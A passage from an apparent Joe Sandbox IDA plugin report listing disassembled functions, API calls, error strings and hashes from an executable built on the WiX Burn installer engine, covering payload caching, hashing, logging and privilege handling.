                                                                                                                                                            • Part of subcall function 0046B18E: SysFreeString.OLEAUT32(00000000), ref: 0046B2FB
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,00000000,condition,00000000,?,DetectionType,?,00000000,?,00000000,00000002,?,00415AED,00000000), ref: 0043E2FC
                                                                                                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,00000000,arp,00000000,?,00415AED,00000000,?), ref: 0043E3FC
                                                                                                                                                            • Part of subcall function 0046B18E: SysAllocString.OLEAUT32(?), ref: 0046B1DF
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: String$CompareVariant$AllocClearFreeInit
                                                                                                                                                          • String ID: ArpDisplayVersion$ArpId$ArpUseUninstallString$ArpWin64$Bundle$DetectCondition$DetectionType$Failed to build full key path.$Failed to get @ArpDisplayVersion.$Failed to get @ArpId.$Failed to get @ArpWin64.$Failed to get @Bundle.$Failed to get @DetectCondition.$Failed to get @DetectionType.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @UninstallArguments.$Failed to get @Uninstallable.$Failed to parse @ArpDisplayVersion: %ls$Failed to parse command lines.$Failed to parse exit codes.$InstallArguments$Invalid detection type: %ls$Invalid protocol type: %ls$Protocol$RepairArguments$Repairable$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$UninstallArguments$Uninstallable$arp$burn$condition$d:\a\wix\wix\src\burn\engine\exeengine.cpp$netfx4$none
                                                                                                                                                          • API String ID: 702752599-2963074696
                                                                                                                                                          • Opcode ID: 2854a7e512559dd9f899eb55f697986bf7501162157cfd9d1b32d10ad1a6f097
                                                                                                                                                          • Instruction ID: 1173f121790aee6c23e6d131af1fb81c3b3eb900601b3ad4c8e95901c37c6fa5
                                                                                                                                                          • Opcode Fuzzy Hash: 2854a7e512559dd9f899eb55f697986bf7501162157cfd9d1b32d10ad1a6f097
                                                                                                                                                          • Instruction Fuzzy Hash: 37F11B32F82331B6DA2161564C4AFEB5D0D9B0AB64F21113BFE18BB2C1DAAC5C4142ED
                                                                                                                                                          Function 004689CF Relevance: 58.1, APIs: 21, Strings: 12, Instructions: 398COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 00468A67
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00468A71
                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 00468AC9
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00468AD3
                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 00468B21
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00468B2B
                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 00468B7C
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00468B86
                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 00468BD7
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00468BE1
                                                                                                                                                          • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 00468C32
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00468C3C
                                                                                                                                                          • SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 00468D3E
                                                                                                                                                          • SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 00468D89
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00468D93
                                                                                                                                                          • SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 00468DDC
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00468DE6
                                                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00468E30
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00468E3A
                                                                                                                                                          • CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 00468E89
                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 00468EC0
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
                                                                                                                                                          • String ID: Failed to create ACL for system restore.$Failed to create administrator SID for system restore.$Failed to create local service SID for system restore.$Failed to create local system SID for system restore.$Failed to create network service SID for system restore.$Failed to create self SID for system restore.$Failed to initialize COM security for system restore.$Failed to initialize security descriptor for system restore.$Failed to set DACL for system restore.$Failed to set administrators group access for system restore.$Failed to set administrators owner for system restore.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\srputil.cpp
                                                                                                                                                          • API String ID: 267631441-1863884823
                                                                                                                                                          • Opcode ID: a83ea16b75d0a90d4f99b95c96d27489610f7f2ebd63591f31821bb13ac54a6f
                                                                                                                                                          • Instruction ID: f2d4cb9a0cc6cd990e3d7e5a70e46b795aad5398d4c7bb32d09ff84eda8c958c
                                                                                                                                                          • Opcode Fuzzy Hash: a83ea16b75d0a90d4f99b95c96d27489610f7f2ebd63591f31821bb13ac54a6f
                                                                                                                                                          • Instruction Fuzzy Hash: FED197B2D412286BD7309B558C44FDBB7BCAF45710F0146AFBD08F7251E6789D408EA9
                                                                                                                                                          Function 00465284 Relevance: 37.0, APIs: 14, Strings: 7, Instructions: 207encryptionfileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,?,F0000040,?,?,?,?,?,?), ref: 004652E9
                                                                                                                                                          • GetLastError.KERNEL32(?,?), ref: 004652F3
                                                                                                                                                          • CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?,?,?), ref: 00465341
                                                                                                                                                          • GetLastError.KERNEL32(?,?), ref: 0046534B
                                                                                                                                                          • CryptHashData.ADVAPI32(?,?,?,00000000,?,?), ref: 004653A6
                                                                                                                                                          • ReadFile.KERNEL32(?,?,00001000,?,00000000,?,?), ref: 004653CA
                                                                                                                                                          • GetLastError.KERNEL32(?,?), ref: 004653D4
                                                                                                                                                          • CryptDestroyHash.ADVAPI32(00000000), ref: 00465427
                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0046543E
                                                                                                                                                          • GetLastError.KERNEL32(?,?), ref: 00465457
                                                                                                                                                          • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,?), ref: 004654A3
                                                                                                                                                          • GetLastError.KERNEL32(?,?), ref: 004654AD
                                                                                                                                                          • SetFilePointerEx.KERNEL32(?,00000000,00000000,0000800E,00000001,?,?), ref: 004654F7
                                                                                                                                                          • GetLastError.KERNEL32(?,?), ref: 00465505
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CryptErrorLast$Hash$ContextFile$AcquireCreateDataDestroyParamPointerReadRelease
                                                                                                                                                          • String ID: Failed to acquire crypto context.$Failed to get file pointer.$Failed to get hash value.$Failed to hash data block.$Failed to initiate hash.$Failed to read data block.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\cryputil.cpp
                                                                                                                                                          • API String ID: 3955742341-402640524
                                                                                                                                                          • Opcode ID: 0a9babcff287eae9071b8e832a49570a0b123d5f9e3e684f4e02b04fafd1c5f7
                                                                                                                                                          • Instruction ID: 74c4a3cc03c5b4668d94b1cde80fa60ecf408fb510d0cc46fc5e8e0ed1095277
                                                                                                                                                          • Opcode Fuzzy Hash: 0a9babcff287eae9071b8e832a49570a0b123d5f9e3e684f4e02b04fafd1c5f7
                                                                                                                                                          • Instruction Fuzzy Hash: 6561F932E40635ABD7319B548D44BAB7668AB04B51F0240B7BD48F7291F7BC8CC19BAD
                                                                                                                                                          Function 004657B9 Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 168threadtimeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • EnterCriticalSection.KERNEL32(004B2588,00000000,?,--- logging level: %hs ---,004A6594,00000000,?,004092BB,00000003), ref: 004657E7
                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000,?,004092BB,00000003), ref: 004657F7
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00465800
                                                                                                                                                          • GetLocalTime.KERNEL32(004092BB,?,004092BB,00000003), ref: 00465816
                                                                                                                                                          • LeaveCriticalSection.KERNEL32(004B2588,?,?,?,00000000,0000FDE9,?,004092BB,00000003), ref: 0046597F
                                                                                                                                                          Strings
                                                                                                                                                          • 8iJ, xrefs: 00465846
                                                                                                                                                          • %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 004658B3
                                                                                                                                                          • d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\logutil.cpp, xrefs: 004658D7, 0046596D
                                                                                                                                                          • $yG, xrefs: 00465881
                                                                                                                                                          • 4iJ, xrefs: 0046584D
                                                                                                                                                          • <iJ, xrefs: 00465863
                                                                                                                                                          • $yG, xrefs: 00465872
                                                                                                                                                          • Failed to write string to log using redirected function: %ls, xrefs: 0046593E
                                                                                                                                                          • Failed to format line prefix., xrefs: 004658C8
                                                                                                                                                          • Failed to write string to log using default function: %ls, xrefs: 0046595E
                                                                                                                                                          • Failed to convert log string to UTF-8, xrefs: 00465909
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                                                                                                                          • String ID: $yG$$yG$%ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls$4iJ$8iJ$<iJ$Failed to convert log string to UTF-8$Failed to format line prefix.$Failed to write string to log using default function: %ls$Failed to write string to log using redirected function: %ls$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\logutil.cpp
                                                                                                                                                          • API String ID: 296830338-3445050236
                                                                                                                                                          • Opcode ID: e69c3fc08d4a5b02fdc3746a51fe285598fb314001f1912c3713567206635aff
                                                                                                                                                          • Instruction ID: 1d492ebc065ce232b939492bbd96e30c18557709b67a3f9fc1df70e4f9ce1a4a
                                                                                                                                                          • Opcode Fuzzy Hash: e69c3fc08d4a5b02fdc3746a51fe285598fb314001f1912c3713567206635aff
                                                                                                                                                          • Instruction Fuzzy Hash: 7151E871E00615BBDB219B95CC09BBF7668EB05B15F15412BF505F72D0E27C8D40C7AA
                                                                                                                                                          Function 0041D96C Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 222COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to transfer working path to unverified path for payload: %ls., xrefs: 0041DA52
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\cache.cpp, xrefs: 0041D9B2, 0041DA0B, 0041DBB8, 0041DBDC
                                                                                                                                                          • Aborted transferring working path to unverified path for payload: %ls., xrefs: 0041DAB3
                                                                                                                                                          • Failed to create unverified path., xrefs: 0041D9F9
                                                                                                                                                          • moving, xrefs: 0041DB46, 0041DB53
                                                                                                                                                          • Failed to get cached path for package with cache id: %ls, xrefs: 0041D9A0
                                                                                                                                                          • Failed to move verified file to complete payload path: %ls, xrefs: 0041DB8B
                                                                                                                                                          • Failed to reset permissions on unverified cached payload: %ls, xrefs: 0041DADD
                                                                                                                                                          • Failed to verify payload: %ls at path: %ls, xrefs: 0041DB2B
                                                                                                                                                          • Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 0041DBCA
                                                                                                                                                          • copying, xrefs: 0041DB4D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Aborted transferring working path to unverified path for payload: %ls.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$Failed to verify payload: %ls at path: %ls$copying$d:\a\wix\wix\src\burn\engine\cache.cpp$moving
                                                                                                                                                          • API String ID: 0-2372213951
                                                                                                                                                          • Opcode ID: fd7653b76ff77a591f7ed269d2034720c0c323c599b89018bedc9814e2ed4af8
                                                                                                                                                          • Instruction ID: d64e87b8fb0c6e41dc1591e6e9ecd781635d9dde9388cd0db50306fa54106ca1
                                                                                                                                                          • Opcode Fuzzy Hash: fd7653b76ff77a591f7ed269d2034720c0c323c599b89018bedc9814e2ed4af8
                                                                                                                                                          • Instruction Fuzzy Hash: E671B372A80215BBEF126E81CC46FDE3E25AF08B55F110116FB04790E0D3B9DDA0AB9D
                                                                                                                                                          Function 00466838 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 128COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00466870
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0046687A
                                                                                                                                                          • OpenProcessToken.ADVAPI32(?,00000020,?), ref: 004668CE
                                                                                                                                                          • GetLastError.KERNEL32 ref: 004668D8
                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(00000000,00000000,00000001,00000010,00000000,00000000), ref: 0046692A
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00466934
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00466978
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00466991
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$Token$AdjustCloseHandleLookupOpenPrivilegePrivilegesProcessValue
                                                                                                                                                          • String ID: Failed to adjust token to add privilege: %ls$Failed to get privilege LUID: %ls$Failed to get process token to adjust privileges.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\procutil.cpp
                                                                                                                                                          • API String ID: 1766547789-1148688956
                                                                                                                                                          • Opcode ID: e8d3679d17837b06aea696018eb5b23bbd61831d79193dffcd4c2a3ce353df03
                                                                                                                                                          • Instruction ID: 351d14d1a3089831185c8d75256483e5362c7b203d08a8a2b94a14870c84165e
                                                                                                                                                          • Opcode Fuzzy Hash: e8d3679d17837b06aea696018eb5b23bbd61831d79193dffcd4c2a3ce353df03
                                                                                                                                                          • Instruction Fuzzy Hash: 3741D672E4123577E3206B558C49F7F7A78EB05B64F42412ABE04BB2D0E6784C448AE9
                                                                                                                                                          Function 0041CB34 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 199fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 0041CB51
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041CB64
                                                                                                                                                          • DecryptFileW.ADVAPI32(?,00000000), ref: 0041CD37
                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0041CD46
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$CloseCreateDecryptErrorHandleLast
                                                                                                                                                          • String ID: Failed to open payload at path: %ls$Failed to verify file size for path: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$Payload has no verification information: %ls$d:\a\wix\wix\src\burn\engine\cache.cpp
                                                                                                                                                          • API String ID: 3262865546-2448136901
                                                                                                                                                          • Opcode ID: fa376da953a7d8ea58e8f6f82b93420acad8f4158d0ac290a6130e20e1d05929
                                                                                                                                                          • Instruction ID: 6cdbdf150335a00c2a66d0d625790ea5694e87eea650a63b463449f80e8de83d
                                                                                                                                                          • Opcode Fuzzy Hash: fa376da953a7d8ea58e8f6f82b93420acad8f4158d0ac290a6130e20e1d05929
                                                                                                                                                          • Instruction Fuzzy Hash: A951EB316C0616BBDB222E549C8AFEB3E25AF04B54F210126F904751D1E36D9CE0DBDD
                                                                                                                                                          Function 0041DC5C Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 150fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:PAI(A;;FA;;;BA)(A;OICIIO;GA;;;BA)(A;;FA;;;SY)(A;OICIIO;GA;;;SY),00000001,00000001,00000000), ref: 0041DC91
                                                                                                                                                          • GetLastError.KERNEL32(0040951C,00000000,0040960C,?,00000001), ref: 0041DC9A
                                                                                                                                                          • DecryptFileW.ADVAPI32(?,00000000), ref: 0041DDA9
                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 0041DDFD
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DescriptorSecurity$ConvertDecryptErrorFileFreeLastLocalString
                                                                                                                                                          • String ID: D:PAI(A;;FA;;;BA)(A;OICIIO;GA;;;BA)(A;;FA;;;SY)(A;OICIIO;GA;;;SY)$Failed to copy working folder.$Failed to create the security descriptor for the working folder.$No usable base working folder found.$d:\a\wix\wix\src\burn\engine\cache.cpp$version.dll
                                                                                                                                                          • API String ID: 936408299-529345945
                                                                                                                                                          • Opcode ID: 996f1f556ca15f9e6b0dcb6549ca3c94186933c1619cfb34fc28d08cd1c2202d
                                                                                                                                                          • Instruction ID: a7019ded047c6914c67b8932003c3d9361b862dc46e37752ba418b532e993c74
                                                                                                                                                          • Opcode Fuzzy Hash: 996f1f556ca15f9e6b0dcb6549ca3c94186933c1619cfb34fc28d08cd1c2202d
                                                                                                                                                          • Instruction Fuzzy Hash: 1941C4B1E40215BBDB11AF64DC45FDF7AA8AF04701F10416AF904F7291E7789D80DBA8
                                                                                                                                                          Function 0040AC60 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 138COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          • Failed to set variant value., xrefs: 0040ADC0
                                                                                                                                                          • d:\a\wix\wix\src\burn\engine\variable.cpp, xrefs: 0040ADD2
                                                                                                                                                          • Failed to get OS info., xrefs: 0040ACB4
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                          • String ID: Failed to get OS info.$Failed to set variant value.$d:\a\wix\wix\src\burn\engine\variable.cpp
                                                                                                                                                          • API String ID: 3664257935-4238978541
                                                                                                                                                          • Opcode ID: e978f8cb67219e56eb47f3f1b47a5da83a3b7742430d28ce65be8baaf12df44d
                                                                                                                                                          • Instruction ID: b4ce1e4f44928a8131f42f2c76acee55e6ac13dd8bd33c51c7519a314af31df5
                                                                                                                                                          • Opcode Fuzzy Hash: e978f8cb67219e56eb47f3f1b47a5da83a3b7742430d28ce65be8baaf12df44d
                                                                                                                                                          • Instruction Fuzzy Hash: C441E871A04318BBDB218B69CC46FEE7BB8EF49711F4044AAF505F7180D2389A91CB5A
                                                                                                                                                          Function 0041C9B3 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 0041C9D0
                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041C9E3
                                                                                                                                                          • DecryptFileW.ADVAPI32(?,00000000), ref: 0041CAE4
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000001,?,00000000,?,?,?,?), ref: 0041CAF3
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
